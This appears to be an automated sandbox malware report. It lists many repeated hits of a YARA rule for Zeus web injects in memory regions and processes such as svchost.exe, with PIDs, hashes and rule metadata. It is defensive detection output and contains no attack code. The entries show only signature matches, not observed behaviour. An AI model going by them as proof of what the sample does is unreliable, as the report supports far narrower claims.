Source: 00000002.00000003.1707472657.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1710147215.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1740206618.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1678394504.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1736767365.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1737316338.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1703776736.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1741195616.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1690060462.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1730745096.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1746920664.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1734938590.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1713404140.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1747674947.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1745970801.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1726563792.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1744700906.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5368, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3816, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4976, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6472, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3132, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 2316, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
